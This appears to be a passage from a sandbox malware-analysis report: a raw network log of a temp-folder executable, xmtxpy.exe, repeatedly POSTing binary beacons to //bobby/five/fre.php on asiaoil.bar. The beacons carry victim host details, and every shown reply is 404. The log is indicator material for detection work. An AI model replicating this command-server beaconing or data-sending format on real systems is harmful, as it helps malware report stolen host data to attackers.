                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:48.837397099 CET | 387 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:48.854139090 CET | 387 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:48.933581114 CET | 388 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M4V5E6ygM8Zq2gQc6SjFi%2FduljsFbImOHJ2nmf7IuPxW2RhXkT%2B0BhOAD5WjYjJ5QxUVoGAUnhyaY3n4fiulEfle%2F5%2F3JKoNA8quALyniLNaaaxsFzuwruQ92V8j%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4466f4f5c92a2-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        44 | 192.168.2.22 | 49209 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:49.900198936 CET | 389 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:49.916532040 CET | 389 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:50.045497894 CET | 390 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:50 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sfchENBNL5Aam3jQilD1C%2BA7X%2BWklnynb2xLSVS2hPjR0y3qmNn6hmUtwb8IQB8oZoMl23JHAHV2q0I12pykgsoVoLNPvb6k5VdZyObk9ltGFYeKlP7GBpYhUI6%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44675ef0390ee-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        45 | 192.168.2.22 | 49210 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:51.041532993 CET | 391 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:51.057890892 CET | 391 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:51.130028963 CET | 392 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Tlu5Y7AoBorQeMU0%2B32D%2BTFyCDvUY1OQkVB8rypJEdhrQ%2Fenzeu1n%2FT9n9uSqWWX9J%2BfmRJVbTKpt0De%2B5ne1ly1J723TtCWodVcJOhHfjabsPPmaz0oqCOHEICNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4467d0fb492c5-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        46 | 192.168.2.22 | 49211 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:52.063119888 CET | 392 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:52.079380035 CET | 393 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:52.182354927 CET | 393 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:52 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqldRdslDF9crV%2Bk4ngGcH%2B5VotqLHwZM1hgM1UlLzVHOK203cYnXP5jYPCyykRHqAUueXlxKMSBzyNAjlM%2Fvqw8Nwi0ss%2FzYQhSE9EUH9wjaK0hKyn3kcN4463E9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446836b79922b-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        47 | 192.168.2.22 | 49212 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:53.153614998 CET | 394 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:53.170088053 CET | 394 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:53.252991915 CET | 395 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:53 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBS7%2BxqKYn8UXFWYtCxhAQUq3wICMu07YMkjyXgzMiD7WnMo34wuo3JBZQt3f%2FvhAz73H9wPdN018HSvgXnDpUBiOvoVzzkvgWsPGM8s4%2F62axP9o7SVvlxiAsFAoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4468a3cbe8fc8-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        48 | 192.168.2.22 | 49213 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:54.210618019 CET | 396 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:54.227287054 CET | 396 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:54.306786060 CET | 397 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0AcT1bifDuMhi7ufsGdy3ZWrMEsl7Ml0%2BBsoYKk1Le07SGb1K3vfiYvudRQACEJNwZd7L%2BjjiNvFHdUhY8ZVQ%2FCWgWD2crnmZAbKNk%2BQ47TcQ8b%2FoLYdTuy2B3gQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44690dd409094-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        49 | 192.168.2.22 | 49214 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:55.222618103 CET | 398 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:55.239134073 CET | 398 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:55.306236029 CET | 399 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:55 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2b3lnzs0K50M9KlApGlxtS1%2FGBbpcngBLWZrh0QHIPyWMt9R51HhBbpbNzNiN2fgnCx%2F6Ol9cv3FYjGdC9Z4%2Ff%2B7v%2FeKPnRbogo3FCV4owbNiUoY5%2BcPZ%2FGa%2BNALAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446972bed9091-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        5 | 192.168.2.22 | 49170 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:05.958935022 CET | 319 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:05.975214958 CET | 320 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:06.048285007 CET | 320 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FkwECIztonU5sKraKeo0SBfQsbzTNEo9c%2Fgv1LcFjyGRwr%2BO5HxPKVAbUysSrtRDLw4YSAITjFTpY93Ba0oLX8DHultt24WrAHZv82zviiHQIIiLmBXtIoOyR3vI7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44563480c9225-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        50 | 192.168.2.22 | 49215 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:56.235039949 CET | 400 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:56.251535892 CET | 400 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:56.328077078 CET | 400 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lLUedeVgcznC2S%2FUOpbd3fV7v3cGuLCjsT%2FMbiJAVwvVHvZbCBonSZeAGG5JhojOiJyGydHeh3PL5Tp9nmU4EBUX2wVPhLZEEPBr7kenjFn1%2BoSu1sUFZrFUzTyPOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4469d8ada926e-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        51 | 192.168.2.22 | 49216 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:57.354640007 CET | 401 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:57.370970011 CET | 402 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:57.520679951 CET | 402 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:57 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pP7Hm%2FZYo7nBNCdlCm%2B6iCgzILR5XUlKf4GwH1GgSKX5qjvCOl3q7%2FhYlNsVlCRNbRgfIjWoULsECCJWVGVm8TwlUOckIQOjjEp9dOME2g%2F3YvZInDvXJ3pNqXehHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446a48a19903d-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        52 | 192.168.2.22 | 49217 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:58.437792063 CET | 403 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:58.454149961 CET | 403 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:58.535232067 CET | 404 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:58 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4Hpj5tBS1W25DrOmF70H9%2B7tI00TcoHrZ2vWxTGczWKIQtBUxqfhFCMGDZXE%2FiPTxLHEXRSNrcwpGvMMbC3NGIUBMWmkmFsI9cJLit7sz%2BX56ge756zUtFrYA%2Fn%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446ab4e2a9049-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        53 | 192.168.2.22 | 49218 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:59.543742895 CET | 405 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:59.559976101 CET | 405 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:59.660451889 CET | 406 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2BJFLdnSBYTENDu1tAbRmg3yPPpEafzaD1AIG2OO%2FT%2B%2FQqTuiDGTxzFlf9dnChU0IP%2BEp15Zkavznvg6v0hcTAYsTYetiP8tjAE8TcK4xJqEQeCFqj2PFKCcO8YbOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446b23dcd9241-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        54 | 192.168.2.22 | 49219 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:00.557396889 CET | 407 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:00.573935032 CET | 407 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:00.711899996 CET | 408 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rk9UBUg8rEXXmstTEerwpTwam6ReU4ftvK8vLG6DGGX39NP0Tj8xTjWk5qWPBqpC6tqrpuX%2FZqaa1n1qmYBhnF44n8KZVoyEqklrYO98Ih0UxdfXxgiW0okoqK2%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446b88b306963-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        55 | 192.168.2.22 | 49220 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:01.628313065 CET | 408 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:01.648943901 CET | 409 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:23:01.731878996 CET | 409 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:23:01 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtSZVRNhVan7fQu%2B%2BS3YF0dvuQRKfPnhQmljq7WJs%2Fj8JMEfpH8AMemLWNbqYw4tgA6v4NG3xTvYc3Z5%2FpGQb5ljWthkbv4uo%2FhbZQYC96NTyl%2B9dg2FM9CZdOcU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db446bf3ee59235-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        56 | 192.168.2.22 | 49221 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:23:02.628099918 CET | 410 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:23:02.645340919 CET | 410 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
